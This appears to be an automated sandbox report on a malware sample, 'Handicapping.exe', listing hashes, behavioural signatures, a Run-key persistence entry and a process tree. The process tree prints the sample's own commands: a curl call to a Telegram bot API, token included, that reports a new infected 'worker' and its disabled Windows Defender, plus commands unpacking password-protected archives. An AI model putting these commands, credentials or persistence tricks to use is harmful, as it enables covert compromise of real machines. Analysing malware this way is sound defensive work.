Analysis
- max time kernel: 34s
- max time network: 23s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 05-12-2021 20:42
- Static task: static1
- Behavioral task: behavioral1
- Sample: Handicapping.exe
- Resource: win10-en-20211014 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Handicapping.exe
- Size: 120KB
- MD5: 60d5e78626f9961a87998315f18fc686
- SHA1: 2bdfc1f3a83bf15de8439b5846079ef0f560f30f
- SHA256: 332e105954e8c17225ff83ed61414ab849f3157d6524fb59d431d0e7be4ef941
- SHA512: 382a1e24421f1434fc4d8162ecbd3f0cbf7a888b5fb86a96cdf732d2a670c70e7e0b4e0ced7f4db321efdcf2959bc4d7da05c78cfea8f091f25e002bda583877
- Score: 10/10
Malware Config
Signatures
- Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
  Processes:
  description | pid | process | target process
  PID 3500 created 3300 | 3500 | WerFault.exe | Handicapping.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun" | Handicapping.exe
- Program crash (1 IoC)
  Processes:
  pid | pid_target | process | target process
  3500 | 3300 | WerFault.exe | Handicapping.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes:
  pid | process
  3500 | WerFault.exe (12 identical entries)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 3500 | WerFault.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
  description | pid | process | target process
  PID 3300 wrote to memory of 3612 | 3300 | Handicapping.exe | cmd.exe
  PID 3300 wrote to memory of 3612 | 3300 | Handicapping.exe | cmd.exe
  PID 3300 wrote to memory of 1948 | 3300 | Handicapping.exe | cmd.exe
  PID 3300 wrote to memory of 1948 | 3300 | Handicapping.exe | cmd.exe
  PID 3300 wrote to memory of 3960 | 3300 | Handicapping.exe | cmd.exe
  PID 3300 wrote to memory of 3960 | 3300 | Handicapping.exe | cmd.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Handicapping.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\Handicapping.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (depth 2)
    command line: C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5054999145:AAFdU1qLbwj0w1g6jHdF6-sMbR_aB06M0ME/sendMessage?chat_id=-773528453&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
  - C:\Windows\system32\cmd.exe (depth 2)
    command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
  - C:\Windows\system32\cmd.exe (depth 2)
    command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
  - C:\Windows\system32\WerFault.exe (depth 2)
    command line: C:\Windows\system32\WerFault.exe -u -p 3300 -s 1688
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken